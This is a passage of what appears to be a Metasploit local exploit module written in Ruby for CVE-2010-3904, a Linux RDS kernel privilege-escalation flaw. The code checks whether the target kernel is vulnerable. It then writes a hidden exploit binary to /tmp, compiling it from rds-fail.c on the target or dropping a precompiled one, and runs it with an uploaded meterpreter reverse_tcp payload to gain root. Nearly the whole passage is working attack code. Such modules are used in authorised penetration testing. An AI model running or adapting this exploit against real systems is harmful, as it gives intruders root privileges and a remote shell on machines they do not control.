[ 'AKA', 'rds-fail.c' ],
[ 'EDB', '15285' ],
[ 'CVE', '2010-3904' ],
[ 'BID', '44219' ],
[ 'URL', 'https://securitytracker.com/id?1024613' ],
[ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=799c10559d60f159ab2232203f222f18fa3c4a5f' ],
[ 'URL', 'http://vulnfactory.org/exploits/rds-fail.c' ],
[ 'URL', 'http://web.archive.org/web/20101020044047/http://www.vsecurity.com/resources/advisory/20101019-1/' ],
[ 'URL', 'http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c' ],
],
'DefaultOptions' =>
{
'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',
'WfsDelay' => 10,
'PrependFork' => true
},
'DefaultTarget' => 0))
register_options [
OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]),
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
]
end
def base_dir
datastore['WritableDir'].to_s
end
def modules_disabled?
modules_disabled = cmd_exec('cat /proc/sys/kernel/modules_disabled').to_s.strip
(modules_disabled.eql?('1') || modules_disabled.eql?('2'))
end
def upload(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
rm_f path
write_file path, data
register_file_for_cleanup path
end
def upload_and_chmodx(path, data)
upload path, data
cmd_exec "chmod +x '#{path}'"
end
def upload_and_compile(path, data)
upload "#{path}.c", data
output = cmd_exec "gcc -o #{path} #{path}.c"
unless output.blank?
print_error output
fail_with Failure::Unknown, "#{path}.c failed to compile"
end
cmd_exec "chmod +x #{path}"
register_file_for_cleanup path
end
def exploit_data(file)
path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2010-3904', file
fd = ::File.open path, 'rb'
data = fd.read fd.stat.size
fd.close
data
end
def live_compile?
return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')
if has_gcc?
vprint_good 'gcc is installed'
return true
end
unless datastore['COMPILE'].eql? 'Auto'
fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'
end
end
def check
version = kernel_release
unless Gem::Version.new(version.split('-').first) >= Gem::Version.new('2.6.30') &&
Gem::Version.new(version.split('-').first) < Gem::Version.new('2.6.37')
vprint_error "Linux kernel version #{version} is not vulnerable"
return CheckCode::Safe
end
vprint_good "Linux kernel version #{version} appears to be vulnerable"
unless cmd_exec('/sbin/modinfo rds').to_s.include? 'Reliable Datagram Sockets'
vprint_error 'RDS kernel module is not available'
return CheckCode::Safe
end
vprint_good 'RDS kernel module is available'
if modules_disabled?
unless cmd_exec('/sbin/lsmod').to_s.include? 'rds'
vprint_error 'RDS kernel module is not loadable'
return CheckCode::Safe
end
end
vprint_good 'RDS kernel module is loadable'
CheckCode::Appears
end
def exploit
unless check == CheckCode::Appears
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
end
if is_root?
fail_with Failure::BadConfig, 'Session already has root privileges'
end
unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
fail_with Failure::BadConfig, "#{base_dir} is not writable"
end
# Upload exploit executable
executable_name = ".#{rand_text_alphanumeric rand(5..10)}"
executable_path = "#{base_dir}/#{executable_name}"
if live_compile?
vprint_status 'Live compiling exploit on system...'
upload_and_compile executable_path, exploit_data('rds-fail.c')
else
vprint_status 'Dropping pre-compiled exploit on system...'
arch = kernel_hardware
case arch
when /amd64|ia64|x86_64|x64/i
upload_and_chmodx executable_path, exploit_data('rds-fail.x64')
when /x86|i[3456]86/
upload_and_chmodx executable_path, exploit_data('rds-fail.x86')
else
fail_with Failure::NoTarget, "No pre-compiled binaries are available for system architecture: #{arch}"
end
end
# Upload payload executable
payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}"
upload_and_chmodx payload_path, generate_payload_exe
# Launch exploit
print_status 'Launching exploit...'
output = cmd_exec "#{executable_path} #{payload_path}"
output.each_line { |line| vprint_status line.chomp }
end
end